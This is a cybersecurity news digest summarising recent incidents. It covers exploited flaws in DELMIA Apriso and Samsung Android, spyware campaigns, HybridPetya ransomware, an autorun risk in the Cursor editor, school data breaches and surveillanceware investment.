Daily Brief

CISA has issued a warning about a critical remote code execution vulnerability in DELMIA Apriso, a manufacturing management solution by Dassault Systèmes. The vulnerability, CVE-2025-5086, has a critical severity score of 9.0 and affects all DELMIA Apriso versions from Release 2020 to 2025. This flaw involves deserialization of untrusted data, potentially allowing attackers to execute arbitrary code remotely on affected systems. Active exploitation attempts have been observed, involving malicious SOAP requests that load and execute a harmful .NET executable. CISA has added this vulnerability to its Known Exploited Vulnerabilities list, urging federal agencies to apply patches by October 2. While the directive is mandatory for federal entities, global enterprises using DELMIA Apriso should also heed the warning and implement necessary security measures. The vulnerability impacts industries such as automotive, aerospace, and electronics, where DELMIA Apriso is integral to production and quality management processes.

Samsung released a security update addressing CVE-2025-21043, a critical vulnerability allowing arbitrary code execution on Android devices. The flaw, rated 8.8 on the CVSS scale, involves an out-of-bounds write in the libimagecodec.quram.so library. Affected Android versions include 13 through 16, with the vulnerability privately disclosed to Samsung in August 2025. Samsung confirmed the vulnerability had been exploited in the wild but did not provide details on the attackers or specific exploitation methods. This patch follows Google's recent fixes for two other Android vulnerabilities, indicating ongoing targeted attacks on the platform. Organizations using Samsung Android devices should prioritize applying the latest security updates to mitigate potential risks. The incident underscores the importance of timely vulnerability management and collaboration between vendors and security researchers.

Apple has alerted French users about a new spyware campaign targeting their devices, marking the fourth notification of such attacks in 2025. The targeted attacks focus on individuals with significant roles, including journalists, lawyers, and politicians, according to CERT-FR. The campaign exploits a security flaw in WhatsApp (CVE-2025-55177) and an Apple iOS bug (CVE-2025-43300) to execute zero-click attacks. WhatsApp has notified fewer than 200 users potentially affected by these sophisticated threats. Apple has introduced Memory Integrity Enforcement in new iPhone models to counteract memory corruption vulnerabilities and hinder spyware deployment. A recent Atlantic Council report notes a sharp increase in U.S. investments in spyware technology, surpassing other nations like Israel and Italy. The report identifies numerous new entities in the spyware market, highlighting the growing complexity and global reach of this industry.

An attack on smart laundry machines at the University of Amsterdam's Spinozacampus has impacted 1,250 students, leaving them without convenient laundry services since July. The digital payment system of five machines was compromised, allowing free use until management decided to close the facility due to financial losses. Duwo, the building management company, has not resolved the issue and refuses to absorb the costs, citing the need for income to maintain affordable services. Students face operational challenges, with only one analog machine available, leading to fears of hygiene issues such as lice infestations. The University of Amsterdam has not provided additional support, directing inquiries back to Duwo, leaving students to find alternative laundry solutions. This incident exemplifies the vulnerabilities of IoT devices, as attacks on such systems have been increasing, with IoT assaults rising significantly in recent years. The situation underscores the importance of robust cybersecurity measures for IoT devices to prevent similar disruptions in essential services.

Cyberattacks require immediate clarity, control, and a reliable recovery plan to mitigate damage and ensure swift recovery. Real-time visibility is crucial for identifying the nature of the attack and determining compromised systems, enabling informed decision-making. Effective control involves containing the attack's spread through predefined roles, playbooks, and integrated incident response technologies. A robust backup and recovery solution acts as a lifeline, restoring systems and maintaining client trust post-attack. Preparation, including advanced monitoring and incident response planning, differentiates successful recovery from potential disaster. The Acronis Threat Research Unit emphasizes the importance of readiness in cybersecurity, providing insights and support to IT teams.

CISA has added CVE-2025-5086, a critical flaw in Dassault Systèmes DELMIA Apriso software, to its Known Exploited Vulnerabilities catalog due to active exploitation. The vulnerability, affecting versions from Release 2020 to 2025, allows remote code execution through deserialization of untrusted data, posing significant security risks. Exploitation attempts have been traced to an IP address in Mexico, involving HTTP requests with Base64-encoded payloads targeting specific software endpoints. The payload decodes to a GZIP-compressed Windows DLL, identified as "Trojan.MSIL.Zapchast.gen," capable of electronic surveillance and data exfiltration. "Trojan.MSIL.Zapchast.gen" has been linked to phishing campaigns over the past decade, with capabilities to capture keystrokes, screenshots, and active application lists. Federal Civilian Executive Branch agencies have been instructed to implement necessary updates by October 2, 2025, to mitigate potential threats. Organizations using affected software should prioritize patching and monitoring for unusual network activity to protect against exploitation.

HybridPetya, a new ransomware strain, has been identified by ESET, capable of bypassing UEFI Secure Boot using a patched vulnerability, CVE-2024-7344, affecting UEFI-based systems. Unlike its predecessors, HybridPetya encrypts the Master File Table on NTFS partitions, using a malicious EFI application to compromise systems. The ransomware comprises a bootkit and installer, with the bootkit encrypting files and displaying misleading messages to victims, demanding $1,000 in Bitcoin for decryption. Select variants exploit a remote code execution vulnerability in the Howyar Reloader UEFI application, bypassing Secure Boot by loading a cloaked bootkit binary. Microsoft addressed the vulnerability in its January 2025 Patch Tuesday update, revoking the vulnerable binary to mitigate the threat. ESET's telemetry indicates no active deployment of HybridPetya in the wild, suggesting it may be a proof-of-concept rather than a widespread threat. The emergence of HybridPetya underscores the increasing interest in Secure Boot bypasses among both researchers and malicious actors, posing ongoing challenges to system security.

A Memphis man received a 57-month prison sentence for stealing and selling digital copies of unreleased movies from a DVD and Blu-ray distribution company. Steven R. Hale admitted to criminal copyright infringement, impacting major film releases like "Spider-Man: No Way Home" and "Black Widow," causing significant financial losses. Hale's illegal activities spanned from February 2021 to March 2022, involving the sale of ripped DVDs and Blu-rays through various e-commerce platforms. The stolen movies were downloaded millions of times online, leading to tens of millions in estimated losses for copyright holders. Hale, previously convicted of armed robbery, also faced charges for unlawful firearm possession during the investigation. The case highlights ongoing challenges in protecting digital media from piracy and the substantial economic impact of such cybercrimes.

Big Brother Watch's "Checkpoint Britain" report warns that a proposed national digital ID could lead to widespread government surveillance and fundamentally change citizen-state relationships. The report suggests the digital ID initiative, aimed at addressing illegal immigration, lacks substantiated evidence of effectiveness and could extend beyond intended uses. Concerns are raised about the potential for "mission creep," where voluntary participation in the digital ID system becomes mandatory, impacting access to essential services. A YouGov poll indicates 63% of British citizens distrust the government to safeguard their data, citing past IT project failures and data breaches. The existing One Login system, integral to the BritCard proposal, reportedly suffers from significant cybersecurity vulnerabilities, raising additional security concerns. Critics argue the digital ID scheme could impose unnecessary burdens on law-abiding citizens, without effectively deterring unauthorized immigration. The report urges the government to ensure stringent limits and protections to prevent the digital ID from becoming a tool for mass surveillance. Historical attempts at implementing digital ID systems in the UK have faced resistance, highlighting ongoing privacy versus security debates.

Samsung addressed a critical remote code execution vulnerability, CVE-2025-21043, affecting Android 13 devices, initially reported by Meta and WhatsApp security teams. The flaw resides in the closed-source library libimagecodec.quram.so, allowing attackers to execute malicious code remotely via an out-of-bounds write weakness. While specific targets remain undisclosed, WhatsApp users on Samsung devices were potentially affected, with other messengers using the library also at risk. Samsung released a security advisory and patch as part of its September 2025 security update to mitigate the threat. WhatsApp previously patched a zero-click vulnerability in its iOS and macOS clients, linked to an Apple zero-day, urging users to update and reset devices. The incident signals the ongoing threat of sophisticated zero-day exploits targeting widely-used platforms and the necessity for timely security updates. Samsung and Meta have yet to provide further details on the attacks, emphasizing the importance of vigilance and proactive cybersecurity measures.

The UK's Information Commissioner's Office (ICO) reports that over half of cyberattacks in schools are initiated by students, with 57% of incidents linked to student activity. A significant portion of these breaches, 30%, involve stolen login details, with students responsible for 97% of such cases, often through observing or noting down credentials. Only 5% of attacks involved sophisticated methods, but the ICO stresses the importance of understanding and mitigating insider threats to prevent future risks. The ICO urges parents to monitor their children's online activities and intervene early to prevent potential involvement in cybercrime. Schools are advised to enhance GDPR training and safeguard systems by minimizing opportunities for students to access sensitive data. Staff also contribute to breaches, with 23% of incidents linked to poor data protection practices, such as unauthorized access or device misuse. The ICO and National Crime Agency (NCA) emphasize the need for awareness programs like Cyber Choices to guide youth towards legal cybersecurity careers.

The shift to cloud-native applications, including containers and serverless technologies, is expanding the attack surface, challenging traditional security models to keep pace with evolving threats. Cloud-native application protection platforms (CNAPPs) are consolidating security functions, integrating visibility, compliance, detection, and response into a unified system for enhanced protection. Runtime visibility is becoming crucial in 2025, offering real-time insights into active and exploitable risks, thus enabling more effective threat prioritization and response. The integration of AI in CNAPPs is transforming security operations, aiding in faster detection and reducing mean time to resolution by filtering noise and enriching context. Accountability and collaboration are emphasized, with vulnerabilities being mapped back to specific teams, ensuring a shared responsibility model and streamlined remediation processes. The consolidation of security tools into CNAPPs aims to reduce fragmentation, operational overhead, and ensure that real-world threats are prioritized over theoretical risks. As cloud-native applications continue to grow, security strategies must evolve to focus on runtime visibility, AI-driven prioritization, and unified platforms to stay ahead of potential threats.

Huntress monitored an attacker's activities after they inadvertently installed its EDR tool, sparking ethical debates within the cybersecurity community. The attacker, whose identity remains unconfirmed, installed the tool via a sponsored Google link, allowing Huntress to observe their operations over three months. During the surveillance, Huntress noted the attacker's use of automation, AI, phishing kits, and malware, as well as their multilingual capabilities in Thai, Spanish, and Portuguese. The incident provided rare insights into attacker behavior, but raised concerns about privacy and the ethical implications of such surveillance by private companies. Huntress defended its actions, stating the research was aligned with industry practices and aimed at educating the security community. Critics questioned whether Huntress's actions constituted unauthorized monitoring or if they should have involved authorities once the situation evolved into intelligence collection. The case has prompted discussions about the balance between security research and privacy rights in the cybersecurity industry.

A vulnerability in the Cursor AI code editor can lead to arbitrary code execution when opening malicious repositories, posing a significant risk to users. The issue arises from the default disabling of the Workspace Trust feature, which allows auto-execution of tasks configured in malicious repositories. Attackers can exploit this flaw by embedding autorun instructions in repositories, potentially leading to credential leaks, file modifications, or broader system compromises. Users are advised to enable Workspace Trust, use alternative editors for untrusted repositories, and audit code before opening it in Cursor. The development is part of a broader trend where AI-powered tools face risks from prompt injections and traditional security vulnerabilities. Anthropic's Claude Code also faces similar threats, with prompt injections potentially causing insecure code to bypass security reviews. AI-driven development tools must prioritize security as a fundamental component to mitigate these evolving threats and vulnerabilities.

The Atlantic Council reports a significant rise in US investment in surveillanceware, with 20 new investors identified, tripling the number compared to other leading countries. Surveillanceware, often sold to law enforcement, is gaining traction in the US, despite global efforts to regulate its proliferation through agreements like the Pall Mall Process. The report identifies numerous new entities, including holding companies and investors, capitalizing on the surveillanceware market, raising concerns about national security implications. A notable investment includes AE Industrial Partners' involvement with Paragon Solutions, which resumed its contract with ICE after ownership changes circumvented previous restrictions. The acquisition of Saito Tech Ltd, a company on the US Entity List, by Integrity Partners for $30 million, reveals regulatory gaps allowing investments in restricted entities. The rise in resellers marketing surveillance technology complicates regulatory oversight, as these entities often operate discreetly, making them challenging to monitor and control. The report calls for addressing the contradiction between US industry investment and government policy to prevent undermining national security efforts.